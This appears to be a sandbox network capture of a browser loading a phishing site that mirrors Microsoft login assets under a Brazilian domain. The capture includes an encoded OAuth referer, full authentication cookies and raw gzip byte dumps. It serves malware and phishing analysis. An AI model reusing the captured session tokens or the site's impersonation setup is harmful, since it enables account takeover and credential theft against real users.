                                                        Referer: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1pZD0zOTE5ZDJiOC1lZjIwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3NraD [TRUNCATED]
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; OH.FLID=e4bebde7-5ba4-49d8-b476-931756888516; .AspNetCore.OpenIdConnect.Nonce.49USBfOQied3yWeklneNnBRgMp5V6TCkW50B00X8sZN6-08gUP7C4VT8ltpLeyjKw6t0mWmXCmBMRZb3H0ziB4fa6mZ1mkbAWHlQ5aw3TxS6XAWJfHgahBcWIu2vzNCIOPDrnm96RaYKqI-252pJ-UZjV7QUHfdMfKdYx1uHnSjp6-HfVfS3Kmq9tXZM2YhpqlGz5i1CuYbEO2fzxB7icNR4fUgESr_VGJC8OYz2CXPlROML_6eU_GrG417A1wJo=N; .AspNetCore.Correlation.ZMc9lLc8XG_FHA7AsKemKsGhCyJShH-wCn7fNfhS9zc=N; esctx-jkXTnxbCM=AQABCQEAAABVrSpeuWamRam2jAF1XRQEDNAk-B-2E58z_H0-QJLvGLCw396iyFQ0SQlwZgT_rkZMOjIX0BlREk7SdS_3Gjck40Z4fztkvwmcn1sQXSriR2IzpxLrG5sEdaAuFg4w1VF7xM9sRR01IbnLTCxFsZcflc2zCEZkG2HUgNsPDnuWAiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AXUAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAB1AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEVTA4RXRMIoxXIbr9n-iyLGrqtPHzQRAW7rkde36tgl54eAYfT65Cw1l2I1F_yOUHXQ4Bf1-8uxohLxNhP3vhk1hOwXrHhhSan6gxhQJ0vFwgAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEF9qztFF8T [TRUNCATED]
                                                        2025-03-17 16:42:51 UTC1386INHTTP/1.1 200 OK
                                                        Date: Mon, 17 Mar 2025 16:42:51 GMT
                                                        Content-Type: application/x-javascript
                                                        content-length: 190151
                                                        Connection: close
                                                        Cache-Control: public, max-age=31536000
                                                        Content-Encoding: gzip
                                                        Last-Modified: Thu, 27 Oct 2022 14:24:13 GMT
                                                        ETag: 0x8DAB826EBE74413
                                                        x-ms-request-id: 8461b44c-901e-0055-805b-97ec70000000
                                                        x-ms-version: 2009-09-19
                                                        x-ms-lease-status: unlocked
                                                        x-ms-blob-type: BlockBlob
                                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                        Access-Control-Allow-Origin: *
                                                        x-azure-ref: 20250317T164250Z-r1769bfd58bpzmwfhC1YTOn53000000002v000000000anyh
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_MISS
                                                        Accept-Ranges: bytes
                                                        Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
                                                        2025-03-17 16:42:51 UTC14998INData Raw: 1f 8b 08 00 00 00 00 00 00 03 cc bd 69 77 db 46 b2 30 fc fd fe 0a 0a 27 57 03 8c da 34 29 2f 71 48 23 bc b2 44 db 4c b4 45 4b 9c 8c ac d1 81 c8 96 04 9b 04 18 00 94 ac 91 f8 df 9f aa ea 1d 04 28 29 c9 7d ef 7b 12 8b 40 a3 7a af ae ae ae ae c5 bf 89 93 51 7a d3 2c f8 98 4f 78 91 dd 9e dd f0 f3 69 34 fc fa 53 9e 26 d3 70 e9 d7 fb fb 93 d3 a0 39 9d e5 57 fe c9 c9 fa 29 3b 61 8c 5d cc 92 61 11 a7 89 cf 59 c1 92 e0 ce 9b e5 bc 91 17 59 3c 2c bc 6e d2 cc fc 22 60 49 73 e4 17 cc fb 35 1a cf f8 cf 50 81 c7 7c 9d 2d b8 cb 78 31 cb 92 46 d6 e4 f3 40 c3 f6 af 79 52 6c 47 05 4f 86 b7 35 e0 51 19 7c 9f 67 79 9c 63 16 5e 93 e5 dc ca 72 94 45 43 be cd af f9 b8 06 78 64 01 6f 4c a7 83 24 8f 2f af 8a 7c 33 cd aa 8b 8f 9d 16 bd 8b 72 5e 0b 6a 17 7d d6 ff 06 4d 1e f1 d1 20
                                                        Data Ascii: iwF0'W4)/qH#DLEK()}{@zQz,Oxi4S&p9W);a]aYY<,n"`Is5P|-x1F@yRlGO5Q|gyc^rECxdoL$/|3r^j}M
                                                        2025-03-17 16:42:51 UTC1386INData Raw: 0d 08 ce 9e 0b aa 1f 8b 11 3c 08 9b 78 48 97 78 46 a5 24 ab d9 bc 5e b4 ed cd 0b ab ad e8 df 24 ba fd 5b b7 2f b7 77 88 4f c2 67 46 4d 1f 0b 75 02 77 fb 58 84 c3 d5 d5 a1 d5 c7 aa bc 89 52 ee 73 55 63 12 54 51 9e 19 a5 98 4c 6c 9b aa 29 7f 81 0e 15 8b c8 b4 6e 6d b8 35 23 fc 77 92 1f 7d c2 7d 60 e9 5a 4e 05 80 55 57 16 ca 64 24 83 8f 7e c9 a2 18 6f be 60 b5 e3 f7 6b ee db cb 3a 66 b6 43 02 28 82 2d f7 ac 41 3e 33 02 d7 52 93 5d 5b 34 e4 fa 89 04 cc b0 a4 8b 56 fe 62 07 43 75 54 db 27 52 61 9c c6 98 e4 50 a6 06 44 5d 6a 06 b3 6a 82 95 ba 93 06 36 1c 95 4e f9 bb 66 f8 2c 4d 84 8f 0d 47 8a 26 24 6d ba 5f e8 23 82 5e ae 0b 25 99 5f 59 dc 77 52 b5 ef 64 61 dc 24 de 4f 1c 01 23 91 79 96 8d 51 e7 a8 6c 4b 13 34 8f 0f b6 c9 ce 5a 39 e8 80 15 a4 7c 3d 89 b6 fd 8f
                                                        Data Ascii: <xHxF$^$[/wOgFMuwXRsUcTQLl)nm5#w}}`ZNUWd$~o`k:fC(-A>3R][4VbCuT'RaPD]jj6Nf,MG&$m_#^%_YwRda$O#yQlK4Z9|=
                                                        2025-03-17 16:42:51 UTC16384INData Raw: 95 a1 50 20 13 dc 09 ae 34 e2 7c 9d 30 c3 e4 c1 b6 9c ec e3 12 20 93 46 e3 3e 5b 03 ed 8f 67 c0 df fb 78 dd a8 ae 19 4d 00 1b f1 d1 0b 4a 7e 13 a6 94 dc 94 fe 24 50 2d cd 47 c7 3d 85 da e1 a9 62 8c 17 47 aa d5 45 78 07 f5 10 07 b4 78 d7 96 12 fa cd e1 40 53 82 00 82 12 ad ae 46 4d f9 c1 a7 c0 2f 64 02 06 d0 26 7a 72 65 91 74 91 31 d8 a2 52 17 e0 ac 82 55 04 66 ae 27 73 c2 f1 f4 4e 01 40 75 31 14 5d 18 6a c4 18 b2 35 15 0a d7 1f b2 c6 32 9c 55 a1 f8 e4 d6 c7 75 7d aa 14 55 21 35 ef fd 38 ba cc eb 7b 49 9f 4d 47 4b d0 e5 be d2 67 31 94 26 37 0c 28 1e c0 a4 59 3c 4b b5 71 c3 5c 85 c2 bd 2b ec d1 92 4d 17 61 b4 95 83 6f ef 6c 96 7c 4d d2 9b e4 cc 13 1e 9b 94 25 3b 59 f4 98 d7 35 b4 ba 8c f2 2b e1 55 59 58 bd d2 fc fe e1 bb b2 80 60 9e 8b 78 bc 40 3a 5d 23 d7
                                                        Data Ascii: P 4|0 F>[gxMJ~$P-G=bGExx@SFM/d&zret1RUf'sN@u1]j52Uu}U!58{IMGKg1&7(Y<Kq\+Maol|M%;Y5+UYX`x@:]#
                                                        2025-03-17 16:42:51 UTC16384INData Raw: cc 68 6f b7 b7 64 ca dd ae 4a d9 e6 94 0f 04 97 4e a7 c2 f3 c0 0e a7 9c 5c a7 49 24 dd 09 ec 72 ca af 8c 88 09 2d 8c 1f 39 e5 34 9e a8 6a 9e 8b 84 db 42 a7 bc 10 4d 31 6e 5a 3c b6 5b a2 db 88 43 dd 12 3d 7d fb d7 30 69 b7 16 fa f8 3e ba 0a 07 54 7e cb df 9f e6 45 7a 1b a9 00 e4 6a 68 f2 b5 bd b5 69 c2 3f 35 45 44 aa 8f 69 2a f6 d3 1c ee fe 11 06 7b 48 f3 40 04 2d 47 ba a3 09 38 bc bd 8d 86 31 dc 16 6c 9b e0 50 7c 7f 9e e4 93 68 00 ab b6 21 cd b3 1c 6c 0b 77 e6 d6 26 55 73 2e 1e b6 90 b0 bb 4d 73 77 2e 1e 76 fc 37 e9 14 ca 0c bb 3e a8 0f 9a 1e 76 57 f0 dc 87 3a 00 b7 fb c2 84 90 d5 be 66 71 11 13 14 69 6f 9a 50 4f 16 3a 3e 3a a0 9e 1c 7c fc 78 fc 91 8a 7e de fb 78 74 78 f4 13 75 e5 f0 e8 ed f1 c7 0f 7b 67 87 c7 47 ed 2d 13 cc 11 ca 6d 0b 35 2b 02 4e 38 96
                                                        Data Ascii: hodJN\I$r-94jBM1nZ<[C=}0i>T~Ezjhi?5EDi*{H@-G81lP|h!lw&Us.Msw.v7>vW:fqioPO:>:|x~xtxu{gG-m5+N8
                                                        2025-03-17 16:42:51 UTC2309INData Raw: e8 02 ed b7 1b 30 09 aa 8b f1 66 7d dd 87 be a5 89 29 6d ad 56 10 1e 45 fe f0 c5 b9 27 2d 54 f4 8d b9 67 48 81 d4 bd 69 12 41 b4 ab f6 4a a9 88 ba 2e f7 14 bf d4 b7 af c8 76 f5 ce 84 88 a4 94 5f fe db 53 02 7c b1 3a 29 cc e0 d4 b9 d5 53 c2 5a f1 1f e1 60 c9 b8 fe d9 5f a6 f1 1e 54 72 f7 2c d6 a6 25 92 b2 05 54 5c b4 7c f5 7c 28 37 70 f8 65 05 40 cc 2d 6c 6a bc cc 66 37 ee 9e 80 f9 cc fa e3 37 ef 09 3a dc 42 5c 16 d1 31 a2 c7 eb d1 b0 76 6c d1 e2 73 a3 67 88 37 5c 6a b0 71 e8 99 52 9f ad a4 04 19 38 94 39 82 75 69 60 e7 f4 5c 2a b4 a1 16 43 bd ad 52 4b 99 83 5a 36 cd 5a 4a ba 22 d3 d4 48 d1 25 4a 49 0a 37 39 2a 67 69 94 18 95 d1 95 a2 45 59 7e 67 31 04 91 52 b1 e0 10 44 c8 86 46 78 19 dd 79 81 ef 00 67 8c 2f 7c 47 71 b0 b5 45 aa 18 02 b8 0d 91 67 44 1e 8a
                                                        Data Ascii: 0f})mVE'-TgHiAJ.v_S|:)SZ`_Tr,%T\||(7pe@-ljf77:B\1vlsg7\jqR89ui`\*CRKZ6ZJ"H%JI79*giEY~g1RDFxyg/|GqEgD
                                                        2025-03-17 16:42:51 UTC9575INData Raw: ad ed ca 9b db c6 95 fc ff fb 29 6c ee ab 14 39 86 15 49 3e 92 48 c3 a8 14 3b 87 de 24 b6 c7 ce 31 bb 1e 8d 8b 92 28 99 36 45 ea 91 94 9d 4c ec ef be 7d 00 20 40 51 76 de 66 77 6a 1c 91 00 08 82 38 1a dd 8d ee 5f 7b 1d a8 08 37 c9 9e c6 fc 78 83 3b 4c 01 55 73 4a f0 d5 9d e3 41 99 b9 98 91 1a 7f 77 af 49 ff 71 83 d1 66 50 7d 23 9a 43 71 0d b7 23 b8 dd 17 3b ea 36 80 db d6 73 f1 02 ee 2d 85 b0 41 8a 08 d9 e9 b7 ee 3b a2 30 7f 7b c2 1c b5 c2 1e 2d 7b 68 ec 75 51 0e ce ca 33 78 56 c0 06 f7 85 e6 3d 77 45 a1 78 4f 65 ca 21 97 f6 af 51 af b4 ca aa 81 e3 43 0b 65 84 0e ea 64 2a 72 94 27 dd 57 b2 c7 46 34 a3 11 3d 4a 93 53 3c bb 46 15 d3 19 b9 09 78 02 be be 2a 75 a4 56 2f 81 00 5b 13 13 89 23 04 f9 19 52 73 d2 56 b3 f2 98 4c be 28 4c b7 d4 1b 27 b6 de 38 2c 55
                                                        Data Ascii: )l9I>H;$1(6EL} @Qvfwj8_{7x;LUsJAwIqfP}#Cq#;6s-A;0{-{huQ3xV=wExOe!QCed*r'WF4=JS<Fx*uV/[#RsVL(L'8,U


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        30192.168.2.44978223.95.206.2314436224C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-17 16:42:52 UTC3294OUTGET /aadcdn.msauth.net/~/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1
                                                        Host: hapiinenstys.criadordeconexoes.com.br
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1pZD0zOTE5ZDJiOC1lZjIwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3NraD [TRUNCATED]
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; OH.FLID=e4bebde7-5ba4-49d8-b476-931756888516; .AspNetCore.OpenIdConnect.Nonce.49USBfOQied3yWeklneNnBRgMp5V6TCkW50B00X8sZN6-08gUP7C4VT8ltpLeyjKw6t0mWmXCmBMRZb3H0ziB4fa6mZ1mkbAWHlQ5aw3TxS6XAWJfHgahBcWIu2vzNCIOPDrnm96RaYKqI-252pJ-UZjV7QUHfdMfKdYx1uHnSjp6-HfVfS3Kmq9tXZM2YhpqlGz5i1CuYbEO2fzxB7icNR4fUgESr_VGJC8OYz2CXPlROML_6eU_GrG417A1wJo=N; .AspNetCore.Correlation.ZMc9lLc8XG_FHA7AsKemKsGhCyJShH-wCn7fNfhS9zc=N; esctx-jkXTnxbCM=AQABCQEAAABVrSpeuWamRam2jAF1XRQEDNAk-B-2E58z_H0-QJLvGLCw396iyFQ0SQlwZgT_rkZMOjIX0BlREk7SdS_3Gjck40Z4fztkvwmcn1sQXSriR2IzpxLrG5sEdaAuFg4w1VF7xM9sRR01IbnLTCxFsZcflc2zCEZkG2HUgNsPDnuWAiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AXUAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAB1AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEVTA4RXRMIoxXIbr9n-iyLGrqtPHzQRAW7rkde36tgl54eAYfT65Cw1l2I1F_yOUHXQ4Bf1-8uxohLxNhP3vhk1hOwXrHhhSan6gxhQJ0vFwgAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEF9qztFF8T [TRUNCATED]
                                                        2025-03-17 16:42:52 UTC738INHTTP/1.1 200 OK
                                                        Date: Mon, 17 Mar 2025 16:42:52 GMT
                                                        Content-Type: image/x-icon
                                                        Content-Length: 17174
                                                        Connection: close
                                                        Cache-Control: public, max-age=31536000
                                                        Last-Modified: Sun, 18 Oct 2020 03:02:03 GMT
                                                        ETag: 0x8D8731230C851A6
                                                        x-ms-request-id: aff3d600-b01e-006d-0191-9548b0000000
                                                        x-ms-version: 2009-09-19
                                                        x-ms-lease-status: unlocked
                                                        x-ms-blob-type: BlockBlob
                                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                        Access-Control-Allow-Origin: *
                                                        x-azure-ref: 20250317T164252Z-r1769bfd58b6fcl7hC1YTO6dp800000004ag00000000f5tk
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2025-03-17 16:42:52 UTC15646INData Raw: 00 00 01 00 06 00 80 80 10 00 00 00 00 00 68 28 00 00 66 00 00 00 48 48 10 00 00 00 00 00 e8 0d 00 00 ce 28 00 00 30 30 10 00 00 00 00 00 68 06 00 00 b6 36 00 00 20 20 10 00 00 00 00 00 e8 02 00 00 1e 3d 00 00 18 18 10 00 00 00 00 00 e8 01 00 00 06 40 00 00 10 10 10 00 00 00 00 00 28 01 00 00 ee 41 00 00 28 00 00 00 80 00 00 00 00 01 00 00 01 00 04 00 00 00 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 ba 7f 00 22 50 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33
                                                        Data Ascii: h(fHH(00h6 =@(A(("P"""""""""""""""""""""""""""""" 333333333333333
                                                        2025-03-17 16:42:52 UTC1528INData Raw: 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 bc 7b 00 1f 4c f9 00 22 50 f2 00 f7 a6 00 00 00 ba 7f 00 f3 a6 00 00 1e 4e f6 00 23 4e f4 00 f3 a4 00 00 00 bc 7d 00 00 ba 7d 00 00 00 00 00 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22
                                                        Data Ascii: ( @{L"PN#N}}"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        31192.168.2.44978423.95.206.2314436224C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-17 16:42:52 UTC3265OUTGET /aadcdn.msauth.net/~/shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_ae573f441ee1cf781ec7.js HTTP/1.1
                                                        Host: hapiinenstys.criadordeconexoes.com.br
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1pZD0zOTE5ZDJiOC1lZjIwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3NraD [TRUNCATED]
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; OH.FLID=e4bebde7-5ba4-49d8-b476-931756888516; .AspNetCore.OpenIdConnect.Nonce.49USBfOQied3yWeklneNnBRgMp5V6TCkW50B00X8sZN6-08gUP7C4VT8ltpLeyjKw6t0mWmXCmBMRZb3H0ziB4fa6mZ1mkbAWHlQ5aw3TxS6XAWJfHgahBcWIu2vzNCIOPDrnm96RaYKqI-252pJ-UZjV7QUHfdMfKdYx1uHnSjp6-HfVfS3Kmq9tXZM2YhpqlGz5i1CuYbEO2fzxB7icNR4fUgESr_VGJC8OYz2CXPlROML_6eU_GrG417A1wJo=N; .AspNetCore.Correlation.ZMc9lLc8XG_FHA7AsKemKsGhCyJShH-wCn7fNfhS9zc=N; esctx-jkXTnxbCM=AQABCQEAAABVrSpeuWamRam2jAF1XRQEDNAk-B-2E58z_H0-QJLvGLCw396iyFQ0SQlwZgT_rkZMOjIX0BlREk7SdS_3Gjck40Z4fztkvwmcn1sQXSriR2IzpxLrG5sEdaAuFg4w1VF7xM9sRR01IbnLTCxFsZcflc2zCEZkG2HUgNsPDnuWAiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AXUAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAB1AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEVTA4RXRMIoxXIbr9n-iyLGrqtPHzQRAW7rkde36tgl54eAYfT65Cw1l2I1F_yOUHXQ4Bf1-8uxohLxNhP3vhk1hOwXrHhhSan6gxhQJ0vFwgAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEF9qztFF8T [TRUNCATED]
                                                        2025-03-17 16:42:52 UTC1385INHTTP/1.1 200 OK
                                                        Date: Mon, 17 Mar 2025 16:42:52 GMT
                                                        Content-Type: application/x-javascript
                                                        content-length: 15748
                                                        Connection: close
                                                        Cache-Control: public, max-age=31536000
                                                        Content-Encoding: gzip
                                                        Last-Modified: Thu, 26 Jan 2023 00:32:55 GMT
                                                        ETag: 0x8DAFF34DE08B462
                                                        x-ms-request-id: 1178434b-b01e-0052-425b-978013000000
                                                        x-ms-version: 2009-09-19
                                                        x-ms-lease-status: unlocked
                                                        x-ms-blob-type: BlockBlob
                                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                        Access-Control-Allow-Origin: *
                                                        x-azure-ref: 20250317T164252Z-r1769bfd58bn88cqhC1YTOg3wc0000000790000000009rdr
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_MISS
                                                        Accept-Ranges: bytes
                                                        Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
                                                        2025-03-17 16:42:52 UTC10INData Raw: 1f 8b 08 00 00 00 00 00 00 03
                                                        Data Ascii:
